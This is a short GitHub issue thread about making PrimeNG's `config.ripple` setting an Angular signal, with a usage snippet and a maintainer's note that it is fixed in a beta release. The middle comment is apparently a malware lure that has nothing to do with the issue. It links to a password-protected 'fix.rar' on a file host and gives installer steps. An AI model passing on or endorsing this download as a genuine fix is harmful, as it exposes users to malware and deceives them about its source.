### ISSUE TITLE
Change config.ripple to signal for better reactivity

### ISSUE THREAD

**Issue by cetincakiroglu** [primefaces/primeng#16295]
`ripple` in PrimeNGConfig will be updated as signal.

New use:

```
import { PrimeNGConfig } from 'primeng/api';
.....
config: PrimeNGConfig = inject(PrimeNGConfig);

config.ripple.set(true); // set new value

config.ripple(); // get the value
.....
```

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cetincakiroglu** [comment]
Fixed in v18.0.0-beta.1
